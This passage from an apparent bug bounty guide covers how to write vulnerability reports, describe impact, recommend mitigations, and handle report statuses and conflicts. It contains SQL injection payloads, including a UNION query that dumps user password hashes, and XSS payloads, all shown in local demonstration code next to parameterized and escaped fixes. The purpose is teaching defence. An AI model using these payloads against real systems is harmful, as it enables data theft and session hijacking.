LEARN FROM SANTIAGO

4.8 – GOOD REPORT

The ability to write a clear, concise and effective report is crucial to success. A good report not only ensures that the vulnerability is understood and resolved quickly, but also reflects your professionalism and increases your chances of receiving a fair reward. This chapter will guide you through the key elements of a high-quality Bug Bounty report.

1. Clear and Descriptive Title:

The title should concisely summarize the vulnerability found. It should be specific enough that the company's security team can quickly identify the problem, but general enough to avoid revealing sensitive details before it has been fixed.

Example:

- Good: "SQL Injection vulnerability in the search parameter."
- Bad: "Website security issue".

2. Executive Summary:

The executive summary is a brief description of the vulnerability, its potential impact, and the recommended solution. It should be concise enough for an executive to quickly understand, but detailed enough for a technician to begin working on the solution.

Example:

A SQL injection vulnerability has been discovered in the website's search parameter. This vulnerability allows an attacker to execute malicious SQL commands in the database, which could result in disclosure of sensitive information, modification of data or even taking control of the server. It is recommended to implement proper input validation and use parameterized queries to prevent this type of attack.

3. Detailed Technical Description:

This section should provide a detailed technical explanation of the vulnerability, including:

- Steps to Reproduce: Step-by-step instructions on how to reproduce the vulnerability.
- Proof of Concept (PoC): Code or examples that demonstrate the vulnerability in action.
- Impact: A description of the potential impact of the vulnerability, including the data or systems that could be affected.
- Root Cause: An explanation of the root cause of the vulnerability, i.e., the error in the code or configuration that allows it to occur.

4. Recommended Solution:

Offer one or more solutions to remediate the vulnerability. Be specific and provide code or configuration examples if possible.

5. Additional Information:

Include any other relevant information, such as screenshots, debug logs, or references to similar vulnerabilities.

Tips for Writing a Good Report:

- Be clear and concise: Avoid unnecessary technical language and use simple, straightforward language.
- Be objective and professional: Avoid accusatory or threatening language.
- Be accurate and detailed: Provide enough information for the security team to reproduce and fix the vulnerability.
- Be respectful and collaborative: Work with the security team to find the best possible solution.

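Section 4 above asks for code or configuration examples where possible. Here is what such an example can look like for the SQL injection used in the executive summary above, which is also the vulnerability behind the impact, proof-of-concept and mitigation examples later in this chapter. It is an added illustration, not code from the book or from any real program: the schema, the rows, the function names and the two payloads are all constructed for it, and it runs against an in-memory SQLite database. It shows the vulnerable search handler (the search term concatenated into dynamic SQL), two payloads that defeat the public = 1 filter and pull rows out of an unrelated users table, and the hardened handler that applies the two mitigations this chapter recommends: allowlist validation and a parameterized query.

```python
import re
import sqlite3

# Constructed sample schema and rows (assumed for this example, not real data).
PRODUCTS = [(1, "laptop", 1), (2, "phone", 1), (3, "secret prototype", 0)]
USERS = [(1, "alice@example.test", "$2b$12$hashA"), (2, "bob@example.test", "$2b$12$hashB")]


def build_db() -> sqlite3.Connection:
    """In-memory database standing in for the application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, public INTEGER)")
    conn.execute("CREATE TABLE users (id INTEGER, email TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def search_vulnerable(conn: sqlite3.Connection, q: str) -> list[str]:
    """Root cause from the report: the search term is concatenated into dynamic SQL."""
    sql = f"SELECT name FROM products WHERE public = 1 AND name LIKE '%{q}%'"
    return [row[0] for row in conn.execute(sql)]


# Proof-of-concept payloads (constructed). The trailing '--' comments out the %' that
# the vulnerable query appends, so the rest of the statement is attacker-controlled.
PAYLOAD_BYPASS_FILTER = "' OR 1=1 --"
PAYLOAD_DUMP_USERS = "' UNION SELECT email || ':' || password_hash FROM users --"

# Mitigation 1: allowlist validation. Letters, digits, space and a few punctuation
# characters, at most 64 long. Anything else is rejected before it reaches the query.
SEARCH_TERM = re.compile(r"[A-Za-z0-9 _.-]{1,64}")


def is_valid_search_term(q: str) -> bool:
    return SEARCH_TERM.fullmatch(q) is not None


def search_parameterized(conn: sqlite3.Connection, q: str) -> list[str]:
    """Mitigation 2 on its own: the term is bound as data and never parsed as SQL.
    A '%' or '_' in q still acts as a LIKE wildcard, which is a functionality
    issue, not an injection."""
    sql = "SELECT name FROM products WHERE public = 1 AND name LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{q}%",))]


def search_hardened(conn: sqlite3.Connection, q: str) -> list[str]:
    """Both mitigations together: reject anything outside the allowlist, then bind."""
    if not is_valid_search_term(q):
        raise ValueError("rejected search term")
    return search_parameterized(conn, q)


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, normal term  :", search_vulnerable(db, "lap"))
    print("vulnerable, filter bypass:", search_vulnerable(db, PAYLOAD_BYPASS_FILTER))
    print("vulnerable, user dump    :", search_vulnerable(db, PAYLOAD_DUMP_USERS))
    print("parameterized, user dump :", search_parameterized(db, PAYLOAD_DUMP_USERS))
    print("hardened accepts payload :", is_valid_search_term(PAYLOAD_DUMP_USERS))
```

The parameterized query is the control that actually closes the bug: search_parameterized returns nothing for either payload even without the allowlist, because the whole string is bound as a single LIKE pattern. The allowlist is defence in depth and also keeps junk out of the application. Against a live target, most programs' rules forbid pulling real user data, so a PoC for the report should prove the injection with a harmless probe (a boolean condition or a version query) and leave the dump scenario to the impact section.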
Sample Full Report:

Title: Reflected Cross-Site Scripting (XSS) Vulnerability in Search Field.

Summary: A cross-site scripting (XSS) vulnerability has been discovered in the search field of the website. This vulnerability allows an attacker to inject malicious JavaScript code into the search results page, which then executes in the victim's browser. This could result in stealing session cookies, disclosing sensitive information or performing unauthorized actions on behalf of the victim. It is recommended to implement proper input validation and output encoding to prevent this type of attack.

Detailed Technical Description:

Vulnerable URL: [URL]
Vulnerable parameter: q
Example payload: <script>alert(1)</script>

Steps to reproduce:
1. Navigate to [URL]?q=<script>alert(1)</script>
2. Notice that a JavaScript alert is executed.

Impact:
- Session cookie theft.
- Disclosure of confidential information.
- Performing unauthorized actions on behalf of the victim.

Root Cause:
- Lack of input validation in the search parameter.
- Lack of output encoding on the search results page.

Recommended Solution:

- Input validation: Implement strict input validation on the search parameter to reject any input containing special characters or scripts.
- Output Encoding: Encode all search parameter output before displaying it on the search results page.

Additional Information:

- Screenshot of the JavaScript alert.
- Link to OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

By writing a good, detailed report, you have a much better chance that the triage team will be able to reproduce your vulnerability easily and accurately. Ultimately, this gives you a better chance of getting paid and a much faster process.

Impact and Attack Scenarios

The ability to describe the impact and attack scenarios of a vulnerability is also essential to demonstrate its severity and relevance. This chapter will guide you through the steps necessary to effectively communicate the potential damage a vulnerability can cause and how an attacker could exploit it.

1. Understand the Potential Impact

Before describing the impact, it is crucial to thoroughly understand the vulnerability and its potential consequences. Consider the following aspects:

- Confidentiality: Could the vulnerability allow an attacker to access sensitive data, such as personal information, financial information or trade secrets?
- Integrity: Could an attacker modify or delete data without authorization, causing damage or disruption to the system?
- Availability: Could the vulnerability be used to launch a denial-of-service (DoS) attack, making the system or service unavailable to legitimate users?
- Financial impact: Could exploitation of the vulnerability result in direct or indirect financial loss to the company, such as theft of funds, fraud or reputational damage?
- Physical security impact: In some cases, vulnerabilities in systems connected to physical devices could have real-world consequences, such as unauthorized control of industrial systems or medical devices.

2. Identify Attack Scenarios

Once you understand the potential impact, it's time to identify the most likely attack scenarios. Consider how an attacker could exploit the vulnerability to achieve their goals.

- Direct attack: Could the attacker exploit the vulnerability directly, without the need for additional steps?
- Chained attack: Could the vulnerability be used in combination with other vulnerabilities to achieve a more sophisticated attack?
- Targeted attack: Could the attacker customize the attack to target specific users or systems?
- Automated attack: Could the vulnerability be exploited on a large scale using automated tools?
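The reflected XSS in the sample report above comes down to one line of server code: the q parameter is written into the results page exactly as received. The snippet below is an added illustration, not code from the book or from any real site; the page template, the example URL and the function names are assumptions. It renders the results page both ways, checks whether the report's PoC payload survives unencoded, and also shows why the report's first recommendation (rejecting special characters) is the weaker of the two: a filter that strips `<script` is bypassed by an event-handler payload, whereas contextual output encoding neutralises that payload, the original one, and an attribute-breakout variant alike.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed results page: the search term is reflected in two HTML contexts,
# an element body and a quoted attribute value. Not a real site's template.
TEMPLATE = '<h1>Results for: {query}</h1>\n<input type="text" name="q" value="{query}">'

PAYLOAD = "<script>alert(1)</script>"          # the PoC payload from the report
PAYLOAD_BYPASS = "<img src=x onerror=alert(1)>"  # no <script> tag at all
PAYLOAD_ATTR = '" autofocus onfocus="alert(1)'  # breaks out of value="..."


def query_from_url(url: str) -> str:
    """Extract q from a report-style 'Vulnerable URL', decoding percent-encoding."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_vulnerable(q: str) -> str:
    """Root cause named in the report: no output encoding on the results page."""
    return TEMPLATE.format(query=q)


def strip_script_tags(q: str) -> str:
    """The kind of 'input validation' that only blocks the payload already known."""
    return q.replace("<script", "").replace("</script", "")


def render_hardened(q: str) -> str:
    """Output encoding: &, <, > and (with quote=True) both quote characters are
    escaped, so the value is inert in element-body and attribute contexts."""
    return TEMPLATE.format(query=html.escape(q, quote=True))


def reflects_raw(page: str, payload: str) -> bool:
    """Success condition of the PoC: the payload appears in the page as sent."""
    return payload in page


if __name__ == "__main__":
    q = query_from_url("https://example.test/search?q=%3Cscript%3Ealert(1)%3C/script%3E")
    print("vulnerable reflects PoC:", reflects_raw(render_vulnerable(q), PAYLOAD))
    print("script filter bypassed :",
          reflects_raw(render_vulnerable(strip_script_tags(PAYLOAD_BYPASS)), PAYLOAD_BYPASS))
    print("hardened reflects PoC  :", reflects_raw(render_hardened(q), PAYLOAD))
    print(render_hardened(PAYLOAD_ATTR))
```

When you write the Recommended Solution section, lead with the encoding fix: it is the control that closes the bug regardless of what the attacker sends, and it is applied at the point where the data meets the page, so a reviewer can verify it in one place. Rejecting every special character in a search box breaks legitimate queries and, as the filter above shows, a blocklist is only as good as the payloads its author thought of.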
3. Describe the Impact and Attack Scenarios in Your Report

When writing your Bug Bounty report, be sure to include a detailed section describing the impact and attack scenarios of the vulnerability. Use clear and concise language, and avoid exaggeration or speculation.

- Impact: Describe the potential impact of the vulnerability in terms of confidentiality, integrity, availability, financial impact and physical security.
- Attack scenarios: Describe the most likely attack scenarios, including the steps an attacker could take to exploit the vulnerability and the objectives they could achieve.
- Evidence: Provide a proof of concept (PoC) that demonstrates the vulnerability in action and supports your claims about the impact and attack scenarios.

Example:

Impact: The SQL injection vulnerability allows an attacker to execute arbitrary SQL commands in the application database. This could result in the disclosure of sensitive user information such as names, email addresses, passwords and financial information. In addition, an attacker could modify or delete data in the database, which could disrupt business operations or cause financial damage.

Attack scenarios: An attacker could exploit this vulnerability by injecting malicious SQL code into application input parameters such as search fields or forms. For example, an attacker could inject an SQL query to extract all records from the user table, or to modify a specific user's data.

Proof of Concept: Attached is a Python script that demonstrates how to exploit the SQL injection vulnerability to extract data from the database.

Tips:

- Be specific and realistic: Avoid generalizations and provide concrete details on how the vulnerability could be exploited and what damage it could cause.
- Prioritize the impact: Emphasize the most serious impacts and those most relevant to the business.
- Be professional and objective: Avoid alarmist or sensationalist language.

By describing the impact and attack scenarios clearly and effectively, you are helping the business understand the severity of the vulnerability and take the necessary steps to protect its systems and users.

Recommend Possible Mitigations (optional)

The ability to recommend effective mitigations is as important as discovering the vulnerability itself. A good report should not only identify the problem, but also provide practical and viable solutions to address it. This chapter will guide you through the steps for recommending sound and relevant mitigations in your Bug Bounty reports.

1. Understand the Root Cause:

Before recommending mitigations, it is critical to understand the root cause of the vulnerability. What error in the code, configuration or application logic allows the vulnerability to exist? Identifying the root cause will allow you to propose specific and effective solutions rather than simply applying superficial patches.

2. Research Best Practices:

Once you have identified the root cause, research best practices and recommended solutions for that type of vulnerability. Consult resources such as:

- OWASP (Open Web Application Security Project): OWASP offers detailed guidance and recommendations on how to prevent and mitigate a wide range of web vulnerabilities.
- NIST (National Institute of Standards and Technology): NIST provides security standards and guidelines for different technologies and industries.
- Security blogs and forums: Check security blogs and forums for the latest trends and expert-recommended solutions.

3. Consider the Application Context:

Mitigations should be tailored to the specific context of the affected application or system. Consider the following aspects:

- Technology: What programming language, framework or platform is used?
- Architecture: What is the architecture of the application? Is it a web, mobile, desktop or cloud application?
- Security requirements: What are the specific security requirements of the application or system?
- Constraints: Are there any technical or resource constraints that may affect the implementation of certain mitigations?

4. Propose Specific and Actionable Mitigations:

In your Bug Bounty report, present clear, specific and actionable mitigations. Avoid generalities and provide technical details on how to implement the proposed solutions.

- Prioritize Mitigations: If there are several possible solutions, prioritize those that are most effective, easy to implement, and have the least impact on application performance and functionality.
- Provide Code Examples: If possible, include code examples or configurations that illustrate how to implement the recommended mitigations.
- Consider Temporary Mitigations: If it is not possible to implement a permanent solution immediately, suggest temporary mitigations that can reduce risk while a long-term solution is being developed.

5. Be Realistic and Balanced:

Recognize that not all vulnerabilities can be fixed immediately or with a perfect solution. Be realistic about the limitations and propose mitigations that are feasible and provide a balance between security, functionality and performance.

Example Mitigation Recommendation:

Vulnerability: SQL injection in the search parameter.

Root Cause: Lack of input validation and use of dynamic SQL queries.

Recommended mitigation:

1. Input validation: Implement strict input validation on the search parameter to allow only alphanumeric characters and a limited set of special characters.
2. Parameterized queries: Use parameterized (prepared) queries, or stored procedures that do not themselves build dynamic SQL, so that user input is always bound as data and never parsed as part of the statement.
3. Escape special characters: Only if parameterized queries are genuinely not an option, escape all special characters in the user input before including them in the SQL query, using the database driver's own escaping routine rather than a hand-written one. Treat this as a last resort: escaping is easy to get wrong and must be repeated at every call site.

Additional Tips:

- Stay current: Technology and security best practices are constantly evolving. Stay informed about the latest trends and solutions in order to provide relevant and up-to-date recommendations.
- Be flexible: Tailor your recommendations to the specific needs and constraints of each company and application.
- Communicate clearly: Explain mitigations clearly and concisely, using language that is understandable to both technical and non-technical audiences.

By following these steps and providing sound and relevant mitigation recommendations, you will be making a significant contribution to improving the security of applications and systems, and strengthening your reputation as a Bug Bounty researcher.

Validate the report

Report validation is a crucial step in ensuring the quality and accuracy of your findings. A well-validated report not only increases your chances of receiving a reward, but also strengthens your reputation as a reliable and professional security researcher. This chapter will guide you through the best practices and techniques for validating your Bug Bounty reports before submitting them to companies.

1. Check Reproducibility:

The first step in validating your report is to ensure that the vulnerability is reproducible. Follow the steps you described in your report and check whether you can consistently replicate the vulnerability. If you cannot reproduce it, you may have made a mistake in your analysis, or the vulnerability may have been fixed since you found it.

2. Verify the Impact:

Make sure the impact you described in your report is accurate and realistic. Does the vulnerability actually allow the attacker to perform the actions you mentioned? Is the potential impact as severe as you described? If necessary, perform additional tests to confirm the actual impact of the vulnerability.

3. Check the Root Cause:

Check whether you have correctly identified the root cause of the vulnerability: is it a bug in the code, a misconfiguration, or a design problem? Understanding the root cause will help you propose more effective mitigations and avoid superficial solutions that do not address the underlying problem.

4. Test Mitigations:

If you have proposed mitigations in your report, test them to ensure that they actually address the vulnerability. Implement the mitigations in a test environment and verify that the vulnerability can no longer be exploited.

5. Check the Wording and Structure:

Make sure your report is well written and structured. Use clear and concise language, avoid grammatical and spelling errors, and organize the information in a logical and easy-to-follow manner. A well-written report is not only easier to understand, but also demonstrates your professionalism and attention to detail.

6. Ask for a Second Opinion:

If possible, ask another security researcher to review your report. A second opinion can help you identify errors or areas for improvement that you may have overlooked. It can also give you a different perspective on the vulnerability and its potential impacts.

7. Use Validation Tools:

There are automated tools that can help you validate your Bug Bounty reports. These tools can scan your report for common errors, such as incomplete information, incorrect formatting or a missing proof of concept.

Anything else?

- Take your time: Don't rush to submit your report. Take the time to carefully validate it and make sure it is as accurate and complete as possible.
- Be Honest and Transparent: If you find errors or inconsistencies in your report, don't try to hide them. Be transparent with the company and correct the errors before submitting the final report.
- Learn from your Mistakes: If your report is rejected or receives negative comments, don't be discouraged. Learn from your mistakes and use that experience to improve your future reports.

Report validation is an essential step in the Bug Bounty process. By taking the time to validate your findings, you are demonstrating your commitment to quality and accuracy, and increasing your chances of receiving a fair reward.

4.9 – BUILDING A RELATIONSHIP

Effective collaboration with the development team is essential to ensure that vulnerabilities are fixed quickly and efficiently. This chapter will guide you through strategies and best practices for building a strong and productive relationship with the development team, fostering trust, communication and mutual respect.

1. Understand their Perspective:

The first step in building a good relationship is to understand the development team's perspective. They are responsible for creating and maintaining the software, and they often have tight deadlines and multiple priorities. By understanding their challenges and constraints, you can tailor your communication and approach to be more effective.

2. Communicate Clearly and Professionally:

Clear and professional communication is the foundation of any good relationship. When reporting vulnerabilities, be sure to:

- Be clear and concise: Describe the vulnerability accurately and in detail, using appropriate technical language.
- Avoid accusatory language: Don't blame or criticize the development team. Instead, focus on the problem and how to fix it.
- Be respectful and collaborative: Show appreciation for their work and offer your help in fixing the vulnerability.
- Answer their questions: If the development team has questions about your report, respond in a timely and thorough manner.

3. Provide Detailed and Actionable Information:

To help the development team understand and fix the vulnerability, provide the following information in your report:

- Steps to reproduce: Detailed instructions on how to reproduce the vulnerability.
- Proof of Concept (PoC): Code or examples that demonstrate the vulnerability in action.
- Impact: A description of the potential impact of the vulnerability, including the data or systems that could be affected.
- Root Cause: An explanation of the root cause of the vulnerability, i.e., the error in the code or configuration that allows it to occur.
- Recommended mitigations: Suggestions on how to fix the vulnerability.

4. Be Patient and Understanding:

Fixing vulnerabilities can take time, especially if they are complex or affect critical systems. Be patient and understanding with the development team, and avoid pressuring them or demanding quick fixes.

5. Offer your Help:

If you have relevant knowledge or experience, offer your help to the development team to fix the vulnerability. This may include:

- Providing additional information: If the development team needs more details or clarification, offer to provide them.
- Helping with testing: If you have access to a test environment, offer to help test proposed solutions.
- Sharing your expertise: If you have expertise in a specific area of security, share your knowledge with the development team to help them improve their security practices.

6. Thank and Acknowledge their Work:

When the development team has fixed the vulnerability, thank them and acknowledge their work. This will help build a positive relationship and foster future collaboration.

Additional Tips:

- Be Proactive: If you see that a vulnerability report has been open for a long time with no response, reach out to the development team to offer your help.
- Be Constructive: If you have comments or suggestions about the Bug Bounty program, share them constructively with the company.
- Be a Good Ambassador: Represent the Bug Bounty community in a positive and professional manner.

Building a strong relationship with the development team is essential to success in the Bug Bounty world. By understanding their perspective, communicating effectively, providing detailed information and offering your assistance, you can foster collaboration and ensure that vulnerabilities are fixed efficiently, benefiting both the company and its users.

Understanding Report States

Vulnerability reports go through different states as they are reviewed, assessed and fixed by companies. Understanding these states is crucial for security researchers, as it allows them to track the progress of their reports, understand companies' decisions, and manage their expectations for rewards and recognition. This chapter will walk you through the most common report statuses on Bug Bounty platforms and provide valuable information for interpreting and responding to each.

1. New:

This is the initial status of a report when it is first submitted to the platform. It indicates that the report is pending review by the company's triage team. At this stage, it is important to be patient and wait for the company to review your report.

2. Triaged:

In this status, the company's triage team has reviewed your report and confirmed that it is a valid vulnerability. The vulnerability is now assigned to a development team for analysis and remediation. This status indicates that your report is being taken seriously and that steps are being taken to address the vulnerability.

3. Needs More Info:

In some cases, the triage team or development team may need more information to understand or reproduce the vulnerability. If your report is in this status, respond to the company's questions in a timely manner and provide any additional information they may need.

4. Resolved:

This status indicates that the company has resolved the vulnerability. At this point, you may receive a reward and/or public recognition for your contribution, depending on program policies.

5. Not Applicable:

If your report does not meet the program requirements or if the reported vulnerability is not considered valid, the report may be marked as "Not Applicable". This may happen if the vulnerability is already known, if it is outside the scope of the program or if it does not represent a significant security risk.

6. Informative:

In some cases, reports that do not qualify for a reward may be marked as "Informative". This means that the information provided in the report is valuable to the company, but does not meet the criteria to receive a reward.

7. Duplicate:

If another researcher has already reported the same vulnerability before you, your report may be marked as "Duplicate". In this case, you will not receive a reward, but your report can be used as additional evidence to confirm the existence of the vulnerability.

8. Won't Fix:

On rare occasions, a company may decide not to fix a reported vulnerability. This may happen if the vulnerability is considered low risk, if the fix is too costly or complex, or if the vulnerability is present in a system that will soon be discontinued.

9. Closed:

This status indicates that the life cycle of the report has ended. This can occur when the vulnerability has been resolved, when the report has been marked as "Not Applicable", "Duplicate" or "Won't Fix", or when an agreement has been reached between the researcher and the company.

Tips for Interpreting Report Statuses:

- Be patient: The vulnerability review and remediation process can take time. Don't despair if your report does not change status immediately.
- Communicate proactively: If you have questions or concerns about the status of your report, don't hesitate to contact the company.
- Learn from feedback: If your report is rejected or marked as "Not Applicable", take advantage of the company's feedback to improve your future reports.

Understanding the different statuses of Bug Bounty reports is essential to managing your expectations and communicating effectively with companies. By following best practices and using this information, you will be better prepared to navigate the Bug Bounty process and maximize your impact as a security researcher.

Dealing with Conflict

Conflict can arise in a variety of situations, from disagreements over the severity of a vulnerability to misunderstandings in communication with companies. This chapter will provide you with strategies and tips for managing conflict effectively, while maintaining professional and constructive relationships with companies and other researchers.

1. Remain Calm and Professional:

When conflict arises, it is crucial to remain calm and act in a professional manner. Avoid emotional or impulsive responses, and focus on resolving the problem constructively. Remember that the goal is to find a solution that benefits all parties involved.

2. Communicate Clearly and Respectfully:

Clear and respectful communication is critical to resolving any conflict. Explain your point of view clearly and concisely, using professional language and avoiding accusations or personal attacks. Listen carefully to the other party's perspective and try to understand their concerns.

3. Look for Common Ground:

Instead of focusing on differences, look for areas of agreement. This can help build trust and make it easier to find a mutually acceptable solution.

4. Be Flexible and Open to Compromise:

In many cases, conflict can be resolved through compromise. Be willing to consider different perspectives and make concessions if necessary. Remember that the goal is to find a solution that works for everyone, not to win at all costs.

5. Use Appropriate Communication Channels:

If the conflict arises on a Bug Bounty platform, use the communication channels provided by the platform to resolve the issue. Avoid taking the conflict to public forums or social networks, as this can worsen the situation and damage your reputation.

6. Seek Mediation if Necessary:

If you are unable to resolve the conflict directly with the other party, consider seeking mediation from a neutral third party, such as the Bug Bounty platform's support team or an independent mediator. A mediator can help facilitate communication, clear up misunderstandings and find solutions that satisfy both parties.

Common Conflict Scenarios and How to Address Them:

- Disagreement on the Severity of a Vulnerability: If you disagree with the company's assessment of the severity of a vulnerability, provide additional evidence and strong arguments to support your point of view. If necessary, request a second opinion from another researcher or the platform's support team.
- Reward Payment Delays: If the company is late in paying your reward, communicate with them in a professional and respectful manner to remind them of the outstanding payment. If the problem persists, you can request help from the platform's support team.
- Communication Problems: If you are having difficulty communicating with the company or feel they are not listening to you, try changing your approach or communication channel. If the problem persists, seek mediation from a third party.
- Conflicts with Other Researchers: If you have a conflict with another researcher, try to resolve it directly and privately with them. If this is not possible, seek mediation from the platform's support team.

Additional Tips:

- Document everything: Keep a record of all communications and actions related to the conflict. This can be useful if you need to present evidence or escalate the issue.
- Learn from your experiences: Every conflict is a learning opportunity. Reflect on what went well and what you could have done differently to improve your conflict resolution skills.
- Maintain a Positive Attitude: Even in difficult situations, maintain a positive and constructive attitude. This will help you maintain professional relationships and find more effective solutions.

Conflict is an inevitable part of any human interaction, even in the world of Bug Bounty. By learning to manage conflict effectively, you will be able to build stronger relationships with companies, solve problems efficiently, and contribute to a more positive and collaborative Bug Bounty environment.

4.10 – WHY ARE YOU FAILING?

Failure is an inevitable part of the learning and growth process. All researchers, even the most experienced, face times when they fail to find vulnerabilities or their reports are rejected. This chapter will explore the common reasons why researchers fail in Bug Bounty programs and provide you with strategies to overcome these challenges and improve your results.

1. Lack of Knowledge and Skills:

One of the most common reasons for failure in Bug Bounty is a lack of technical knowledge and skills. Cybersecurity is a constantly evolving field, and it is crucial to stay up to date on the latest trends, techniques and tools.

- Solution: Invest time in learning and improving your skills. Participate in online courses, read blogs and specialized books, attend conferences and workshops, and practice your skills on ethical hacking platforms such as Hack The Box, TryHackMe and PortSwigger Web Security Academy.

2. Lack of Focus and Strategy:

Many researchers jump into Bug Bounty programs without a clear strategy, moving from program to program without a defined focus. This can lead to dispersed effort and a lack of results.

- Solution: Define your objectives and priorities. Choose programs that align with your skills and interests, and develop a vulnerability hunting strategy that is tailored to each program.

3. Lack of Persistence and Patience:

Finding vulnerabilities can be a long and tedious process. Many researchers get discouraged after a few unsuccessful attempts and abandon the program.

- Solution: Be persistent and patient. Don't give up easily and keep looking for vulnerabilities even if you don't find anything right away. Remember that every failed attempt is a learning opportunity.

4. Lack of Communication and Collaboration:

Effective communication with the company and collaboration with other researchers are key to success in Bug Bounty. If you do not communicate clearly and professionally, or if you are unwilling to collaborate, your reports may be rejected or ignored.

- Solution: Improve your communication skills and collaborate with other researchers. Make sure your reports are clear, concise and contain all the information necessary for the company to reproduce and fix the vulnerability.

5. Not Reading the Program Rules:

Each Bug Bounty program has its own rules and scope. If you don't read the rules carefully, you may report vulnerabilities that are outside the scope of the program or use impermissible testing techniques, which can lead to rejection of your reports.

- Solution: Read the program rules carefully before you start looking for vulnerabilities. Make sure you understand what assets are included in the scope, what types of vulnerabilities are eligible for rewards, and what testing techniques are allowed.

6. Focus on Low Severity Vulnerabilities:

Many researchers focus on finding a large number of low-severity vulnerabilities, rather than looking for critical vulnerabilities that may have a greater impact. This can lead to lower rewards and less personal satisfaction.

- Solution: Prioritize quality over quantity. Focus on finding high-severity vulnerabilities that can have a significant impact on the company's security.

7. Failure to Learn from Mistakes:

Every rejected report is a learning opportunity. If you don't analyze your mistakes and learn from them, you are likely to keep making the same mistakes in the future.

- Solution: Analyze your rejected reports and learn from your mistakes. Ask for feedback from the company and other researchers, and use that information to improve your future reports.

Failure is a natural part of the learning process in Bug Bounty. By understanding the common reasons for failure and applying the right strategies, you can overcome challenges, improve your skills, and increase your chances of success in this exciting field.

4.11 – WHAT TO DO WHEN YOU ARE STUCK

It's common to encounter moments when you feel stuck. You may have spent hours searching for vulnerabilities without success, or you may come across a technical obstacle that you don't know how to overcome. This chapter will provide you with practical strategies and tips for overcoming those stuck moments and moving forward on your journey as a security researcher.

1. Recognize that you are stuck:

The first step to overcoming a roadblock is to recognize that you are stuck. Don't get frustrated or give up. Instead, accept that this is a normal part of the process and that all researchers face this challenge at some point.

2. Take a Break:

Sometimes, the best solution is to step away from the problem for a while. Take a break, go for a walk, exercise or do some activity that helps you clear your mind. When you return to the problem, you may have a new perspective or a fresh idea.

3. Change your Focus:

If you have been focusing on a specific type of vulnerability or a particular testing technique, try changing your focus. Explore other areas of the system or try different tools and
let's get to work 163


techniques. Sometimes, a change of perspective may be all you need to find a vulnerability.

4. Ask for Help:

Don't be afraid to ask other researchers for help. Join online communities such as forums or Discord groups where you can ask questions, share your experiences and learn from others. You can also look for mentors or Bug Bounty partners with whom you can collaborate and share ideas.

5. Learn from your Mistakes:

Every time you get stuck, it's a learning opportunity. Analyze what went wrong and what you could have done differently. Learn from your mistakes and use that knowledge to improve your future vulnerability searches.

6. Break the Problem into Smaller Parts:

If you are faced with a complex problem, break it down into smaller, more manageable parts. This will help you approach the problem more systematically and avoid feeling overwhelmed.

7. Research and Learn:

Sometimes, you get stuck because you lack knowledge or skills in a specific area. Spend time researching and learning about that area. Read books, blogs, articles and technical documentation, and practice your skills in testing environments.

8. Don't Give Up:

Persistence is key in the Bug Bounty world. Don't give up easily, even if you face obstacles or failures. Keep learning, improving your skills and looking for new opportunities.

Additional Tips:

- Keep a Positive Attitude: A positive attitude can make all the difference when you face challenges. Stay motivated and confident, even when the going gets tough.
- Celebrate Your Achievements: Recognize and celebrate your successes, no matter how small. This will help you stay motivated and keep moving forward.
- Don't Compare Yourself to Others: Every researcher has his or her own pace of learning and progress. Don't compare yourself to others and focus on your own development.

Getting stuck is a normal part of the Bug Bounty process. By applying the strategies and tips presented in this chapter, you will be able to overcome roadblocks, learn from your mistakes, and keep moving forward on your path as a successful security researcher. Remember, the key is to maintain a positive attitude, be persistent and never stop learning.


A Word from Santiago's Experience: Lessons Learned from a Decade of Bug Bounty

After almost a decade immersed in the exciting world of Bug Bounty, I have accumulated a number of experiences, learnings and reflections that I would like to share in this chapter. I hope these words will serve as inspiration and guidance for those who are just starting their journey in this field or for those who are looking to improve their skills and results.

1. Passion:

My adventure into the world of Bug Bounty began as a hobby, a passion that drove me to explore the depths of computer security. I found the thrill of finding a vulnerability and contributing to a more secure digital environment to be incredibly rewarding. This passion has been the driving force that has kept me going over the years, even during the most challenging times.

2. Constant Learning:

Cybersecurity is a constantly evolving field. Technologies change, threats become more sophisticated, and attack and defense techniques continually adapt. To stay relevant and competitive, I have had to invest time and effort in constantly learning. I have attended conferences, read books and blogs, participated in online courses, and collaborated with other researchers. The learning never ends in this field, and that is one of the things I am most passionate about.

3. The Importance of Community:

The Bug Bounty community is an invaluable resource. I have learned a lot from other researchers, sharing knowledge, experiences and advice. Collaboration and mutual support are critical to growth and success in this field. Participating in online forums, chat groups, and community events has allowed me to make valuable connections and learn from the best.

4. The Hacker Mentality:

The hacker mindset is a way of thinking that goes beyond simply looking for vulnerabilities. It's about questioning everything, looking for creative solutions and thinking outside the box. This mindset has allowed me to find vulnerabilities that others overlooked and develop innovative solutions to complex problems.

5. Ethics and Responsibility:

Ethics and accountability are fundamental pillars in the Bug Bounty world. As security researchers, we have a responsibility to report vulnerabilities responsibly, protecting users and avoiding causing unnecessary harm. Responsible disclosure is essential to maintain trust between researchers and companies, and to ensure that vulnerabilities are properly addressed.

6. The Balance between Passion and Profession:

As my career in Bug Bounty took off, I had to find a balance between my passion for security and the demands of a professional career. This involved setting schedules, defining clear goals, and learning how to manage my time effectively. I also had to learn to deal with the stress and pressure that comes with working in such a demanding field.

7. Positive Impact:

One of the greatest satisfactions of my career has been seeing the positive impact my findings have had on the security of companies and their users. Knowing that I have contributed to protecting people from cyber threats motivates me to keep going and strive to improve every day.

8. The Future of Bug Bounty:

The future of Bug Bounty is bright. As technology advances and cyber threats become more sophisticated, the demand for talented security researchers will continue to grow. Bug Bounty programs are expanding into new areas, such as supply chain security, cloud security and IoT device security. Bounties are increasing and companies are investing more in security programs.

My experience in the Bug Bounty world has been an incredible journey full of challenges, learnings and satisfactions. I have had the opportunity to work on exciting projects, meet amazing people and make a real difference in the world. If you are considering a career in Bug Bounty, I encourage you to follow your passion, constantly learn, connect with the community and never lose sight of the importance of ethics and accountability.



CONCLUSION

TRANSFORM YOUR PASSION INTO BOUNTIES



